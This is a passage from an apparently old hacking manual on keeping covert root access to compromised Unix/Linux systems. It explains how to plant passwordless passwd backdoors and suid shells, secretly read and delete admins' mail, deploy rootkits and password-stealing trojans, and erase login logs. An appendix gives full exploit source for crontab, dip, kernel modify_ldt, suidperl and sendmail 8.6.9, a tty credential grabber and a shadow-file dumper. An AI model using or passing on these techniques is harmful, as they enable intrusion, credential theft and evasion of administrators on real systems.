  4829. that no one would ever even want to enter into, and use this for your nested
  4830. directory.  You can even make your own directory there like:(...) ;)
  4831.  
  4832.  
  4833. Making new commands
  4834. --------------------
  4835. After you check the cron to see if there is md5 being used there, you might
  4836. want to either copy one of your exploits to another filename in the system,
  4837. or maybe just overwrite a command that you know would never be used.  If
  4838. you copy to a new file name make sure you touch the file date.  This is not
  4839. so long lasting because sooner or later they will patch the exploit and your
  4840. new file you made will not work anymore.
  4841.  
  4842. It is better to use a shell for the new filename, and then make it suid.
  4843.  
  4844. Adding or changing passwd entry's
  4845. ---------------------------------
  4846. Another backdoor that you can use is to add a new user to the passwd file.
  4847. This needs to be done with caution making it look like it belongs there.
  4848. Never use your passwd addition, never login, it is just for a backup in case
  4849. you loose access.
  4850.  
  4851. There are different thoughts here: you do not have to make it a root account
  4852. that could cause notice to it right away.  You know you can have root any time
  4853. you want it.  Lets practice ...
  4854.  
  4855. We want to make our account look like it belongs, so lets keep to the top of
  4856. the file.
  4857.  
  4858. root:fVi3YqWnkd4rY:0:0:root:/root:/bin/bash
  4859. sysop:mZjb4XjnJT1Ys:582:200:System Operator:/home/sysop:/bin/bash
  4860. bin:*:1:1:bin:/bin:
  4861. daemon:*:2:2:daemon:/sbin:
  4862. adm:*:3:4:adm:/var/adm:
  4863. lp:*:4:7:lp:/var/spool/lpd:
  4864. sync:*:5:0:sync:/sbin:/bin/sync
  4865. shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
  4866. halt:*:7:0:halt:/sbin:/sbin/halt
  4867. mail:*:8:12:mail:/var/spool/mail:
  4868. news:*:9:13:news:/usr/lib/news:
  4869. uucp:*:10:14:uucp:/var/spool/uucppublic:
  4870. operator:*:11:0:operator:/root:/bin/bash
  4871. games:*:12:100:games:/usr/games:
  4872. man:*:13:15:man:/usr/man:
  4873. postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
  4874. nobody:*:65535:100:nobody:/dev/null:
  4875. ftp:*:404:1::/home/ftp:/bin/bash
  4876.  
  4877. Looking at the above passwd file leaves us a few options so i will just list
  4878. them here.
  4879.  
  4880. 1. Look at the user line for operator, ftp, and postmaster.  All of these
  4881. accounts have shells with no passwd's set yet.  From your shell just type:
  4882.  
  4883. passwd postmaster
  4884.  
  4885. Set the account with no passwd by just pressing enter.  Now you will be able
  4886. to log into this account any time without a password and the file will still
  4887. look right to the admin.
  4888.  
  4889. 2. add this line to the passwd file:
  4890.  
  4891. syst::13:12:system:/var/spool:/bin/bash
  4892.  
  4893. Place it in the file where it seems to flow.  You can leave the :: for the
  4894. passwd or set the passwd to what you want by typing: passwd syst from the
  4895. root shell.  Set the group and id above to what you like.
  4896.  
  4897.  
  4898. 3. Look at the line above for sync
  4899.  
  4900. sync:*:5:0:sync:/sbin:/bin/sync
  4901.  
  4902. Change this to :
  4903.  
  4904. sync:*:5:0:sync:/sbin:/bin/bash and then run <passwd sync> and leave the passwd
  4905. blank.  (or set a passwd don't matter) On this account we are even gid=0 <G>rin
  4906.  
  4907. Installing games
  4908. ----------------
  4909.  
  4910. You could always install exploitable doom or abuse into the system if they
  4911. already have games installed.  I will include the root exploits for these
  4912. games below in the appendix.
  4913.  
  4914. Always be watching
  4915. ------------------
  4916.  
  4917. Always know who the admin's are on a system, you can find them by looking at
  4918. the passwd file to see home directories, placement of the uid, group access
  4919. accounts, and ALWAYS read all of the bash_history files in the user directories
  4920. to see who is using admin commands.  You will also learn allot of new commands
  4921. from reading history files, but you want to know who is who on the system.
  4922. Get to know your system well. Look for users using su:  View the log files
  4923. to see who is using admin commands.
  4924.  
  4925. Always be watching the system, keep track of who is on while you are.  Watch
  4926. the admin's history to see what commands they are using, ttysnoops? too many
  4927. ps commands?  finger commands after ps or w or who commands will show they
  4928. are watching what other users on the system are doing.  Watch your admin's
  4929. and get to know how aware they are of users on their system.
  4930.  
  4931. Reading system mail
  4932.  
  4933. Rember first NEVER to use system mail programs!  They will be able to tell you
  4934. are reading their mail.  I use a combo of a few things.  Here you go...
  4935.  
  4936. 1. cd /var/spool/mail
  4937.  
  4938. This will put you into the directory that holds all of the unread mail, or
  4939. waiting mail.  Now you can do things like:
  4940.  
  4941. grep -i security * |more
  4942. grep -i hack * |more
  4943. grep -i intruder * |more
  4944. grep -i passwd * |more
  4945. grep -i password * |more
  4946.  
  4947. Then if needed pico username, and ctrl w to search for your maeesge.  You
  4948. can also delete messages if you see some other admin is telling them that
  4949. your user name is hacking their machine from their domain.
  4950.  
  4951. For a mail reader that will allow toy to read mail without updating pointers
  4952. try:
  4953.  
  4954. http://obsidian.cse.fau.edu/~fc
  4955. has a util on it that can cat /var/spool/mail files without changing the
  4956. last read dates.. ie they have no idea that you have read their mail.
  4957.  
  4958. Also remember you can find other system mail in user's directories.  Make sure
  4959. to look in the /root directory.  Look for /root/mail or username/mail or other
  4960. directories or filders that contain older mail.
  4961.  
  4962. Happy Hunting ...
  4963.  
  4964. --------------------------------
  4965. Section 7B
  4966. Root and Demon kits and trojans
  4967. --------------------------------
  4968.  
  4969. Root kits are C source for ps, login, netstat and sometimes some other
  4970. programs that have been hacked for you.  With these kits you will be
  4971. able to replace the login files on the hacked box so that you can login
  4972. without an account on the machine.
  4973.  
  4974. You will also be able to patch ps so that you will not show up when an
  4975. admin uses the ps command.  With the ps patch you can also have it not show
  4976. processes that have certain file names such as any file that starts with
  4977. 'sniff'.
  4978.  
  4979. Demon kits will have hacked programs for identd, login demon, ping, su,
  4980. telnetd, and, socket.
  4981.  
  4982. Trojans will be any file that you can use that will allow you to exploit
  4983. the system in some way.  An su trojan placed in the admin's directory would
  4984. run the trojan su first after you change the export path for him ;) and report
  4985. back that he typed the wrong passwd and delete the trojan file, but saving
  4986. the password he typed to the /tmp directory.
  4987.  
  4988. A login trojan would save all login passwords to a file on the machine
  4989. for you.  I think you get the idea ;)
  4990.  
  4991. Demon and Linux root kits have been uuencoded and attached to the end of
  4992. appendix VI
  4993.  
  4994. ******************************************
  4995. * Appendix I - Things to do after access *
  4996. ******************************************
  4997.  
  4998.  
  4999. I think in this paper we have covered most of the things  you can do after
  5000. access, so I will make this in the style of a checklist from a to z.
  5001.  
  5002. a. learn who the admin's are on the system
  5003. b. watch the system with ps -auxe and ps -auxef (if it works) and pstree to
  5004.    try and keep track of what others are doing
  5005. c. read all of the bash history files or any history files you can find on the
  5006.    machine to learn more yourself, and to learn about the users
  5007. d. make as many backdoor's into the system as you can that you are sure will
  5008.    not be found out
  5009. e. keep the access to yourself, don't give out users passwords on the machine
  5010.    you get root on.
  5011. f. always clean your utmp and wtmp right away when you login
  5012. g. always clean your mess as you go along, this includes your xferlog and
  5013.    messages
  5014. h. if you have root access make sure to read /etc/syslog.conf and
  5015.    /etc/login.defs to see how the system is logging
  5016. i. before changing binary files look at the root cron to see what they are
  5017.    running.
  5018. j. look for md5 on the system
  5019. k. look for separate ftp logs
  5020. l. make sure to clean the www logs if you ever send phf commands to the server
  5021. m. make an suid root shell and place it somewhere on the system
  5022. n. do only what you are sure of, don't do everything in this hacking manual all
  5023.    at once or you are asking to get cought
  5024. o. only use nested directories, do not put files into user directories where
  5025.    all they need to do is type ls to see them
  5026. p. don't add user accounts and think they will not notice you.
  5027. q. don't use pine or other mail programs to read users mail. if you want to
  5028.    read mail go to the mail dir and read it from unix, new mail you will find
  5029.    in /var/spool/mail read it there.
  5030. r. don't change the system so that other programs they have running will not
  5031.    work any more, they will be on you like fly's on shit
  5032. s. don't delete files on the system unless you put them there
  5033. t. do not modify their web pages, like i was here ... you are not a hacker you
  5034.    are a little kid wanting attention
  5035. u. do not change any passwords on the system (unless you are doing it for
  5036.    access and have backed up the passwd file and replace it right after you
  5037.    login
  5038. v. do not use any root account machines for irc access, or to load a bot on
  5039. w. if your root account changes or you create files that are owned by the
  5040.    wrong group, be sure to chown the files
  5041. x. do not use .rhosts if there is already one there that is being used
  5042. y. never telnet or ftp to your account from the hacked box
  5043. z. don't fuck up their machine! only do what you know how to do.
  5044.  
  5045. ****************************************************
  5046. * Appendix II - Hacking / Security WWW / ftp sites *
  5047. ****************************************************
  5048.  
  5049. IRC QuantumG #virus
  5050. Quantum's Linux Page
  5051. http://obsidian.me.fau.edu/~quantum
  5052. Nice site for a bit of info and unix exploits!
  5053.  
  5054. CyberToast's Files section
  5055. Here you will find a nice selection of hacking, crackers, hex editors, viruses,
  5056. cracks, phreaking, war dialers, scanners, and, misc files.
  5057. www.ilf.net/~toast/files
  5058.  
  5059. Reptiles Realm
  5060. A nice site for many linux exploits
  5061. www.users.interport.net/~reptile/linux
  5062.  
  5063. FTP site loaded with all kinds of IRC, BOTS, UNIX EXPLOITS, VIRUSES and ZINES!
  5064. http://ftp.giga.or.at/pub/hacker
  5065.  
  5066. Linux Security Digest
  5067. Lot's to look at here
  5068. http://king.dom.de/~un/linux-security
  5069.  
  5070. Linux Security Alert
  5071. http://bach.cis.temple.edu/linux/linux-security/Linux-Alerts
  5072.  
  5073. The Linux Security Home Page
  5074. http://www.ecst.csuchico.edu/~jtmurphy
  5075.  
  5076. These are good sites just to get you started, there are many links on these.
  5077. Just make sure to browse in your favorite engine and search for words like:
  5078. hack, linux, unix, crack ect....
  5079.  
  5080. *********************************************************
  5081. * Appendix III - More exploits for root or other access *
  5082. *********************************************************
  5083.  
  5084.  
  5085. ..........................................................................
  5086. .                                                                        .
  5087. . 1. vixie crontab buffer overflow for RedHat Linux                      .
  5088. ..........................................................................
  5089.  
  5090. If crontab is suid it is more then likely exploitable.
  5091.  
  5092.  
  5093. -----------cut here
  5094.  
  5095. /* vixie crontab buffer overflow for RedHat Linux
  5096.  *
  5097.  * I don't think too many people know that redhat uses vixie crontab.
  5098.  * I didn't find this, just exploited it.
  5099.  *
  5100.  *
  5101.  * Dave G. <daveg@escape.com>
  5102.  * 10/13/96
  5103.  *
  5104.  */
  5105.  
  5106. #include <stdio.h>
  5107. #include <sys/types.h>
  5108. #include <stdlib.h>
  5109. #include <fcntl.h>
  5110. #include <unistd.h>
  5111.  
  5112. #define DEFAULT_OFFSET          -1240
  5113. #define BUFFER_SIZE             100     /* MAX_TEMPSTR is 100 */
  5114. #define HAPPY_FILE              "./Window"
  5115.  
  5116. long get_esp(void)
  5117. {
  5118.    __asm__("movl %esp,%eax\n");
  5119. }
  5120.  
  5121. main(int argc, char **argv)
  5122. {
  5123.    int fd;
  5124.    char *buff = NULL;
  5125.    unsigned long *addr_ptr = NULL;
  5126.    char *ptr = NULL;
  5127.   u_char execshell[] = 
  5128.    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  5129.    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  5130.    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
  5131.  
  5132.  
  5133.   
  5134. /*
  5135.  * The sscanf line reads for 'name' as %[^ =].  Neither a space, nor
  5136.  * a '=' character appears below
  5137.  */
  5138.  
  5139.    
  5140.    int i;
  5141.    int ofs = DEFAULT_OFFSET;
  5142.  
  5143.    /* if we have a argument, use it as offset, else use default */
  5144.    if(argc == 2)
  5145.       ofs = atoi(argv[1]);   
  5146.    else if (argc > 2) {
  5147.       fprintf(stderr, "egg [offset]\n");
  5148.       exit(-1);
  5149.    }
  5150.    /* print the offset in use */
  5151.    printf("Using offset of esp + %d (%x)\n", ofs, get_esp()+ofs);
  5152.    
  5153.    buff = malloc(4096);
  5154.    if(!buff)
  5155.    {
  5156.       printf("can't allocate memory\n");
  5157.       exit(0);
  5158.    }
  5159.    ptr = buff;
  5160.    /* fill start of buffer with nops */
  5161.    memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
  5162.    ptr += BUFFER_SIZE-strlen(execshell);
  5163.    /* stick asm code into the buffer */
  5164.    for(i=0;i < strlen(execshell);i++) 
  5165.       *(ptr++) = execshell[i];
  5166.    
  5167.    addr_ptr = (long *)ptr;
  5168.    for(i=0;i < (878/4);i++)
  5169.       *(addr_ptr++) = get_esp() + ofs;
  5170.    ptr = (char *)addr_ptr;
  5171.    *ptr++ = '=';
  5172.    *ptr++ = 'X';
  5173.    *ptr++ = '\n';
  5174.    *ptr = 0;
  5175.    printf("Writing to %s\n", HAPPY_FILE);
  5176.  
  5177. /*
  5178.  * The sleep is required because as soon as crontab opens the tmp file it
  5179.  * stat's and saves it.  After the EDITOR program exists it stats again
  5180.  * and if they are equal then it assumes changes weren't made and exits.
  5181.  */
  5182.    fd = open(HAPPY_FILE, O_WRONLY|O_CREAT, 0666);
  5183.    write (fd, buff, strlen(buff));
  5184.  
  5185.    close(fd);
  5186.  
  5187.    execl("/usr/bin/crontab","crontab",HAPPY_FILE,NULL); 
  5188.    /* Successful completion */
  5189.    exit(0);
  5190. }
  5191. ----------- cut here
  5192.  
  5193. ..........................................................................
  5194. .                                                                        .
  5195. .  2. Root dip exploit                                                   .
  5196. .                                                                        .
  5197. ..........................................................................
  5198.  
  5199. in /sbin you will find a symbolic link called dip to a suid root binary.
  5200. Chances are, if this file is suid, it's sploitable.
  5201.  
  5202. -------- cut here
  5203.  
  5204. #include <unistd.h>
  5205. #include <stdio.h>
  5206. #include <stdlib.h>
  5207. #include <fcntl.h>
  5208. #include <sys/stat.h>
  5209. #define PATH_DIP "/sbin/dip"
  5210. u_char shell[] = 
  5211. "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
  5212. "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
  5213. "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/hs";
  5214. u_long esp() { __asm__("movl %esp, %eax"); }
  5215. main()
  5216. {
  5217.   u_char buf[1024];
  5218.   u_long addr;
  5219.   int i, f;
  5220.  
  5221.   strcpy(buf, "chatkey ");
  5222.   addr = esp() - 192;
  5223.   for (i=8; i<128+16; i+=4)
  5224.     *((u_long *) (buf+i)) = addr;
  5225.   for (i=128+16; i<512; i++)
  5226.     buf[i] = 0x90;
  5227.   for (i=0; i<strlen(shell); i++)
  5228.     buf[512+i] = shell[i];
  5229.   buf[512+i] = '\n';
  5230.  
  5231.   if ((f = open("/tmp/temp.dip", O_WRONLY|O_TRUNC|O_CREAT, 0600)) < 0) {
  5232.     perror("temp.dip");
  5233.     exit(0);
  5234.   }
  5235.   write(f, buf, 512+i);
  5236.   close(f);
  5237.  
  5238.   execl(PATH_DIP, "dip", "/tmp/temp.dip", (char *)0);
  5239. }
  5240.  
  5241. ---------- cut here
  5242.  
  5243. ..........................................................................
  5244. .                                                                        .
  5245. . 3. ldt - text by quantumg                                              .
  5246. .                                                                        .
  5247. ..........................................................................
  5248.  
  5249. this one is a little old but I'm rather proud of it so I thought I'd give
  5250. it a praise.  in writing the linux kernel the guys who wrote a certain
  5251. section fucked up.  they let you stretch and modify the area of memory
  5252. you can access.  at first the sploit required a System.map to be in the
  5253. root dir.  so the simple solution to the bug was to delete all System.map
  5254. files off the system and remove all the uncompressed kernels (cause you
  5255. can generate a System.map by doing an nm on uncompressed kernels), this
  5256. is now rather stupid cause there are patches for all kernel versions with
  5257. the bug and I have written a version of this sploit that doesn't need a
  5258. System.map.
  5259.  
  5260. ---------- cut here
  5261. /* this is a hack of a hack.  a valid System.map was needed to get this
  5262.    sploit to werk.. but not any longer.. This sploit will give you root
  5263.    if the modify_ldt bug werks.. which I beleive it does in any kernel 
  5264.    before 1.3.20 ..
  5265.    
  5266.    QuantumG
  5267. */
  5268.  
  5269. /* original code written by Morten Welinder.
  5270.  *
  5271.  * this required 2 hacks to work on the 1.2.13 kernel that I've tested on:
  5272.  * 1. asm/sigcontext.h does not exist on 1.2.13 and so it is removed.
  5273.  * 2. the _task in the System.map file has no leading underscore.
  5274.  * I am not sure at what point these were changed, if you are
  5275.  * using this on a newer kernel compile with NEWERKERNEL defined.
  5276.  *                                          -ReD
  5277.  */
  5278.  
  5279. #include <linux/ldt.h>
  5280. #include <stdio.h>
  5281. #include <linux/unistd.h>
  5282. #include <signal.h>
  5283. #ifdef NEWERKERNEL
  5284. #include <asm/sigcontext.h>
  5285. #endif
  5286. #define __KERNEL__
  5287. #include <linux/sched.h>
  5288. #include <linux/module.h>
  5289.  
  5290. static inline _syscall1(int,get_kernel_syms,struct kernel_sym *,table);
  5291. static inline _syscall3(int, modify_ldt, int, func, void *, ptr, unsigned long, bytecount)
  5292.  
  5293.  
  5294. #define KERNEL_BASE 0xc0000000
  5295. /* ------------------------------------------------------------------------ */
  5296. static __inline__ unsigned char
  5297. __farpeek (int seg, unsigned ofs)
  5298. {
  5299.   unsigned char res;
  5300.   asm ("mov %w1,%%gs ; gs; movb (%2),%%al"
  5301.        : "=a" (res)
  5302.        : "r" (seg), "r" (ofs));
  5303.   return res;
  5304. }
  5305. /* ------------------------------------------------------------------------ */
  5306. static __inline__ void
  5307. __farpoke (int seg, unsigned ofs, unsigned char b)
  5308. {
  5309.   asm ("mov %w0,%%gs ; gs; movb %b2,(%1)"
  5310.        : /* No results.  */
  5311.        : "r" (seg), "r" (ofs), "r" (b));
  5312. }
  5313. /* ------------------------------------------------------------------------ */
  5314. void
  5315. memgetseg (void *dst, int seg, const void *src, int size)
  5316. {
  5317.   while (size-- > 0)
  5318.     *(char *)dst++ = __farpeek (seg, (unsigned)(src++));
  5319. }
  5320. /* ------------------------------------------------------------------------ */
  5321. void
  5322. memputseg (int seg, void *dst, const void *src, int size)
  5323. {
  5324.   while (size-- > 0)
  5325.     __farpoke (seg, (unsigned)(dst++), *(char *)src++);
  5326. }
  5327. /* ------------------------------------------------------------------------ */
  5328. int
  5329. main ()
  5330. {
  5331.   int stat, i,j,k;
  5332.   struct modify_ldt_ldt_s ldt_entry;
  5333.   FILE *syms;
  5334.   char line[100];
  5335.   struct task_struct **task, *taskptr, thistask;
  5336.   struct kernel_sym blah[4096];
  5337.  
  5338.   printf ("Bogusity checker for modify_ldt system call.\n");
  5339.  
  5340.   printf ("Testing for page-size limit bug...\n");
  5341.   ldt_entry.entry_number = 0;
  5342.   ldt_entry.base_addr = 0xbfffffff;
  5343.   ldt_entry.limit = 0;
  5344.   ldt_entry.seg_32bit = 1;
  5345.   ldt_entry.contents = MODIFY_LDT_CONTENTS_DATA;
  5346.   ldt_entry.read_exec_only = 0;
  5347.   ldt_entry.limit_in_pages = 1;
  5348.   ldt_entry.seg_not_present = 0;
  5349.   stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
  5350.   if (stat)
  5351.     /* Continue after reporting error.  */
  5352.     printf ("This bug has been fixed in your kernel.\n");
  5353.   else
  5354.     {
  5355.       printf ("Shit happens: ");
  5356.       printf ("0xc0000000 - 0xc0000ffe is accessible.\n");
  5357.     }
  5358.  
  5359.   printf ("Testing for expand-down limit bug...\n");
  5360.   ldt_entry.base_addr = 0x00000000;
  5361.   ldt_entry.limit = 1;
  5362.   ldt_entry.contents = MODIFY_LDT_CONTENTS_STACK;
  5363.   ldt_entry.limit_in_pages = 0;
  5364.   stat = modify_ldt (1, &ldt_entry, sizeof (ldt_entry));
  5365.   if (stat)
  5366.     {
  5367.       printf ("This bug has been fixed in your kernel.\n");
  5368.       return 1;
  5369.     }
  5370.   else
  5371.     {
  5372.       printf ("Shit happens: ");
  5373.       printf ("0x00000000 - 0xfffffffd is accessible.\n");
  5374.     }
  5375.  
  5376.   i = get_kernel_syms(blah);
  5377.   k = i+10;
  5378.   for (j=0; j<i; j++) 
  5379.    if (!strcmp(blah[j].name,"current") || !strcmp(blah[j].name,"_current")) k = j;
  5380.   if (k==i+10) { printf("current not found!!!\n"); return(1); }
  5381.   j=k;
  5382.  
  5383.   taskptr = (struct task_struct *) (KERNEL_BASE + blah[j].value);
  5384.   memgetseg (&taskptr, 7, taskptr, sizeof (taskptr));  
  5385.   taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) taskptr);
  5386.   memgetseg (&thistask, 7, taskptr, sizeof (thistask));  
  5387.   if (thistask.pid!=getpid()) { printf("current process not found\n"); return(1); }
  5388.   printf("Current process is %i\n",thistask.pid);
  5389.   taskptr = (struct task_struct *) (KERNEL_BASE + (unsigned long) thistask.p_pptr);
  5390.   memgetseg (&thistask, 7, taskptr, sizeof (thistask));  
  5391.   if (thistask.pid!=getppid()) { printf("current process not found\n"); return(1); }
  5392.   printf("Parent process is %i\n",thistask.pid);
  5393.   thistask.uid = thistask.euid = thistask.suid = thistask.fsuid = 0;
  5394.   thistask.gid = thistask.egid = thistask.sgid = thistask.fsgid = 0;
  5395.   memputseg (7, taskptr, &thistask, sizeof (thistask));
  5396.   printf ("Shit happens: parent process is now root process.\n");
  5397.   return 0;
  5398. };
  5399.  
  5400. ----------- cut here
  5401.  
  5402. ..........................................................................
  5403. .                                                                        .
  5404. . 4. suid perl  - text by quantumg                                       .
  5405. ..........................................................................
  5406.  
  5407. In the /usr/bin dir (usually) you will find a suid root binary called
  5408. suidperl.  If this file is suid root it is most probably sploitable.
  5409.  
  5410. You need to set this file suid
  5411. (chmod 4700 will do it) and execute it to get root.
  5412.  
  5413. ---------- cut here
  5414.  
  5415. #!/usr/bin/suidperl
  5416. $> = 0;                                     #set effective user id
  5417. $ENV{'PATH'} = '/bin:/usr/bin';             #secure the session
  5418. $ENV{'IFS'} = '' if $ENV{'IFS'} ne '';
  5419. $execpath = "/bin/sh";                      #sameol sameol
  5420. $execpath =~ /(.*)/;                        #untaint the variable
  5421. $boom = $1;                                 #$boom untainted
  5422. system $boom;                               #run EUID=0 shell
  5423.  
  5424. ----------------cut here
  5425.  
  5426. ..........................................................................
  5427. .                                                                        .
  5428. . 5. Abuse Sendmail 8.6.9                                                .
  5429. .                                                                        .
  5430. ..........................................................................
  5431.  
  5432. -----------cut here
  5433. /* smh.c - atreus - Michael R. Widner (2/27/95)
  5434.  * <widner@uchicago.edu> <atreus@primus.com>
  5435.  * a quick hack to abuse sendmail 8.6.9 or whatever else is subject to this
  5436.  * hole.  It's really just a matter of passing newlines in arguments to
  5437.  * sendmail and getting the stuff into the queue files.  If we run this
  5438.  * locally with -odq we are guaranteed that it will be queue, rather than
  5439.  * processed immediately.
  5440.  * usage: smh [ username [/path/to/sendmail]]
  5441.  * It's worth noting that this is generally only good for getting bin.
  5442.  * sendmail still wants to process the sendmail.cf file, which contains
  5443.  * Ou1 and Og1 most of the time, limiting you to bin access.  Is there
  5444.  * a way around this?
  5445.  * cc -o smh smh.c should do the trick.  This just creates a bin owned
  5446.  * mode 6777 copy of /bin/sh in /tmp called /tmp/newsh.  Note that on some
  5447.  * systems this is pretty much worthless, but you're smart enough to know
  5448.  * which systems those are.  Aren't you?
  5449. bash$ ./smh root /usr/lib/sendmail
  5450. bash$ /usr/lib/sendmail -q
  5451. */
  5452. #include <sys/types.h>
  5453. #include <unistd.h>   
  5454. #include <stdlib.h>   
  5455.  
  5456. /* Take Your Pick */
  5457. #define EVIL_COMMAND1 "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/cp /bin/sh /tmp/newsh\">\nR<\"|/bin/chmod 6777 /tmp/newsh\">\n$rascii "
  5458. #define EVIL_COMMAND2 "ascii\nCroot\nMprog, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nMlocal, P=/bin/sh, F=lsDFMeu, A=sh -c $u\nR<\"|/bin/echo ingreslock stream tcp nowait root /bin/sh /bin/sh  >/tmp/.inetd.conf\">\nR<\"|/usr/sbin/inetd /tmp/.inetd.conf\">\n$rascii "
  5459.  
  5460. main(argc, argv)
  5461. int argc;
  5462. char **argv;
  5463. {                          
  5464.       execlp(argv[2] ? argv[2] : "sendmail","sendmail","-odq","-p", EVIL_COMMAND1,
  5465.       argv[1] ? argv[1] : "atreus",0);
  5466. }
  5467.  
  5468. ----------- cut here
  5469. ..........................................................................
  5470. .                                                                        .
  5471. . 6. ttysurf - grab someone's tty                                         .
  5472. ..........................................................................
  5473.  
  5474. ------------cut here
  5475. #include <stdio.h>
  5476. #include <signal.h>
  5477. #include <fcntl.h>
  5478. #include <errno.h>
  5479. #include <sys/types.h>
  5480. #include <sys/termios.h>
  5481.  
  5482. #define DEBUG 1         /* Enable additional debugging info (needed!) */
  5483. #define USLEEP          /* Define this if your UNIX supports usleep() */
  5484.  
  5485. #ifdef ULTRIX
  5486. #define TCGETS TCGETP   /* Get termios structure */
  5487. #define TCSETS TCSANOW  /* Set termios structure */
  5488. #endif
  5489.  
  5490.  
  5491. handler(signal)
  5492.            int signal;             /* signalnumber */
  5493. {                       /* do nothing, ignore the signal */
  5494.         if(DEBUG) printf("Ignoring signal %d\n",signal);
  5495. }
  5496.  
  5497. int readandpush(f,string)
  5498. FILE *f;
  5499. char *string;
  5500. {
  5501.         char *cp,*result;
  5502.         int e;
  5503.         struct termios termios;
  5504.  
  5505.         result=fgets(string,20,f);    /* Read a line into string */
  5506.         if (result==NULL)
  5507.         {       perror("fgets()");
  5508.                 return(1);
  5509.         }
  5510.         if (DEBUG)
  5511.         {       printf("String: %s\n",string);
  5512.                 fflush(stdout);
  5513.         }
  5514.  
  5515.         ioctl(0,TCGETS,&termios);       /* These 3 lines turn off input echo */
  5516.  /*        echo = (termios.c_lflag & ECHO);      */
  5517.         termios.c_lflag=((termios.c_lflag | ECHO) - ECHO);
  5518.         ioctl(0,TCSETS,&termios);
  5519.  
  5520.         for (cp=string;*cp;cp++)        /* Push it back as input */
  5521.         {       e=ioctl(0,TIOCSTI,cp);
  5522.                 if(e<0)
  5523.                 {       perror("ioctl()");
  5524.                         return(1);
  5525.                 }
  5526.         }
  5527.         return(0);
  5528. }
  5529.  
  5530. main(argc,argv)
  5531. int argc;
  5532. char *argv[];
  5533. {
  5534.         /* variables */
  5535.         int err;
  5536.         FILE *f;
  5537.         char *term      = "12345678901234567890";
  5538.         char *login     = "12345678901234567890";
  5539.         char *password  = "12345678901234567890";
  5540.         if (argc < 2)
  5541.         {       printf("Usage: %s /dev/ttyp?\nDon't forget to redirect the output to a file !\n",argv[0]);
  5542.                 printf("Enter ttyname: ");
  5543.                 gets(term);
  5544.         }
  5545.         else term=argv[argc-1];
  5546.  
  5547.         signal(SIGQUIT,handler);
  5548.         signal(SIGINT,handler);
  5549.         signal(SIGTERM,handler);
  5550.         signal(SIGHUP,handler);
  5551.         signal(SIGTTOU,handler);
  5552.  
  5553.         close(0);               /* close stdin */
  5554. #ifdef ULTRIX
  5555.         if(setpgrp(0,100)==-1)
  5556.                 perror("setpgrp:");     /* Hopefully this works */
  5557. #else
  5558.         if(setsid()==-1)
  5559.                 perror("setsid:"); /* Disconnect from our controlling TTY and
  5560.                                    start a new session as sessionleader */
  5561. #endif
  5562.         f=fopen(term,"r");      /* Open tty as a stream, this guarantees
  5563.                                            getting file descriptor 0 */
  5564.         if (f==NULL)
  5565.         {       printf("Error opening %s with fopen()\n",term);
  5566.                 exit(2);
  5567.         }
  5568.         if (DEBUG) system("ps -xu>>/dev/null &");
  5569.         fclose(f);              /* Close the TTY again */
  5570.         f=fopen("/dev/tty","r");        /* We can now use /dev/tty instead */
  5571.         if (f==NULL)
  5572.         {       printf("Error opening /dev/tty with fopen()\n",term);
  5573.                 exit(2);
  5574.         }
  5575.  
  5576.         if(readandpush(f,login)==0)
  5577.         {
  5578. #ifdef USLEEP
  5579.                 usleep(20000);  /* This gives login(1) a chance to read the
  5580.                                    string, or the second call would read the
  5581.                                    input that the first call pushed back ! /*
  5582. #else
  5583.                 for(i=0;i<1000;i++)
  5584.                         err=err+(i*i)
  5585.                            /* error        /* Alternatives not yet implemented */
  5586. #endif
  5587.                 readandpush(f,password);
  5588.                 printf("Result: First: %s Second: %s\n",login,password);
  5589.         }
  5590.  
  5591.         fflush(stdout);
  5592.         sleep(30);      /* Waste some time, to prevent that we send a SIGHUP
  5593.                            to login(1), which would kill the user. Instead,
  5594.                            wait a while. We then send SIGHUP to the shell of
  5595.                            the user, which will ignore it. */
  5596.         fclose(f);
  5597. }
  5598. --------------cut here
  5599.  
  5600. ..........................................................................
  5601. .                                                                        .
  5602. . 7. shadow.c  - Get shadow passwd files                                 .
  5603. .                                                                        .
  5604. ..........................................................................
  5605.  
  5606. ----------- cut here
  5607.  
  5608.  /*  This source will/should print out SHADOWPW passwd files.   */
  5609.  
  5610.  struct  SHADOWPW {                 /* see getpwent(3) */
  5611.       char *pw_name;
  5612.       char *pw_passwd;
  5613.       int  pw_uid;
  5614.       int  pw_gid;
  5615.       int  pw_quota;
  5616.       char *pw_comment;
  5617.       char *pw_gecos;
  5618.       char *pw_dir;
  5619.       char *pw_shell;
  5620.  };
  5621.  struct passwd *getpwent(), *getpwuid(), *getpwnam();
  5622.  
  5623.  #ifdef   elxsis?
  5624.  
  5625.  /* Name of the shadow password file. Contains password and aging info */
  5626.  
  5627.  #define  SHADOWPW "/etc/shadowpw"
  5628.  #define  SHADOWPW_PAG "/etc/shadowpw.pag"
  5629.  #define  SHADOWPW_DIR "/etc/shadowpw.dir"
  5630.  /*
  5631.   *  Shadow password file pwd->pw_gecos field contains:
  5632.   *
  5633.   *  <type>,<period>,<last_time>,<old_time>,<old_password>
  5634.   *
  5635.   *  <type>     = Type of password criteria to enforce (type int).
  5636.   *        BSD_CRIT (0), normal BSD.
  5637.   *        STR_CRIT (1), strong passwords.
  5638.   *  <period>  = Password aging period (type long).
  5639.   *        0, no aging.
  5640.   *        else, number of seconds in aging period.
  5641.   *  <last_time>     = Time (seconds from epoch) of the last password
  5642.   *        change (type long).
  5643.   *        0, never changed.n
